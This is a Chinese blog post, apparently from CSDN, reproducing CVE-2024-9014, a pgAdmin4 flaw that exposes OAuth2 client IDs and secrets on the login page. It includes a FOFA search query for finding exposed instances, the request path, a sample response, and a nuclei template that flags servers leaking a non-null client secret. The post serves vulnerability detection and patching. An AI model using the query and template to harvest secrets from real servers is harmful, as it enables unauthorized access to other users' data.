CVE-2024-9014 pgAdmin4 OAuth2 client ID与secret敏感信息泄漏漏洞

于 2024-10-08 11:00:56 发布
阅读量934 收藏 9
点赞数 15
分类专栏: 漏洞复现 文章标签: 漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/142753819
版权

文章目录

免责声明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

pgAdmin4 是开源数据库 PostgreSQL 的图形管理工具攻击者可构造恶意请求获取客户端ID和密钥,从而导致未经授权访问其他用户数据

搜索语法

fofa

icon_hash="1502815117"

在这里插入图片描述

漏洞复现

在这里插入图片描述
访问路径http://ip/login?next=/

查看响应包
在这里插入图片描述
响应内容

<script type="application/javascript">
            try {
    require(
        ['security.pages'],
        function() {
            window.renderSecurityPage('login_user', {"authSources": ["internal"], "authSourcesEnum": {"KERBEROS": "kerberos", "OAUTH2": "oauth2"}, "csrfToken": "IjM5YjhjZGJlZjM2OTQzNTg5M2QyMWEzNDMzYzU1ZDczNTlmODQwM2Mi.ZwSebA.GaAE-WFrqQP1H7q11HTAzDl8sdU", "forgotPassUrl": "/browser/reset_password", "langOptions": [{"label": "English", "value": "en"}, {"label": "Chinese (Simplified)", "value": "zh"}, {"label": "Czech", "value": "cs"}, {"label": "French", "value": "fr"}, {"label": "German", "value": "de"}, {"label": "Indonesian", "value": "id"}, {"label": "Italian", "value": "it"}, {"label": "Japanese", "value": "ja"}, {"label": "Korean", "value": "ko"}, {"label": "Polish", "value": "pl"}, {"label": "Portuguese (Brazilian)", "value": "pt_BR"}, {"label": "Russian", "value": "ru"}, {"label": "Spanish", "value": "es"}], "loginBanner": "", "loginUrl": "/authenticate/login", "oauth2Config": [{"OAUTH2_ADDITIONAL_CLAIMS": null, "OAUTH2_API_BASE_URL": null, "OAUTH2_AUTHORIZATION_URL": null, "OAUTH2_BUTTON_COLOR": null, "OAUTH2_CLIENT_ID": null, "OAUTH2_CLIENT_SECRET": null, "OAUTH2_DISPLAY_NAME": "\u003cOauth2 Display Name\u003e", "OAUTH2_ICON": null, "OAUTH2_LOGOUT_URL": null, "OAUTH2_NAME": null, "OAUTH2_SCOPE": null, "OAUTH2_SERVER_METADATA_URL": null, "OAUTH2_SSL_CERT_VERIFICATION": true, "OAUTH2_TOKEN_URL": null, "OAUTH2_USERINFO_ENDPOINT": null, "OAUTH2_USERNAME_CLAIM": null}], "userLanguage": "en"},
                {"messages": [["error", "You must sign in to view this resource."]]});
        }, function() {
            console.log(arguments);
        }
    );
} catch (err) {
    console.log(err);
}
</script>

nuclei

id: CVE-2024-9014 pgAdmin 4 Sensitive Data Exposure
info:
  name: pgAdmin 4 Sensitive Data Exposure
  author: xl
  severity: critical
  
http:
  - raw:
      - |
        GET /login?next=/ HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        negative: true
        regex:
          - 'OAUTH2_CLIENT_SECRET": null'
      - type: word
        part: body
        words:
          - '<title>pgAdmin 4</title>'
          - 'OAUTH2_CLIENT_SECRET'
        condition: and
      - type: status
        status:
          - 200

修复建议

更新到最新版本

抠脚大汉在网络
关注
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值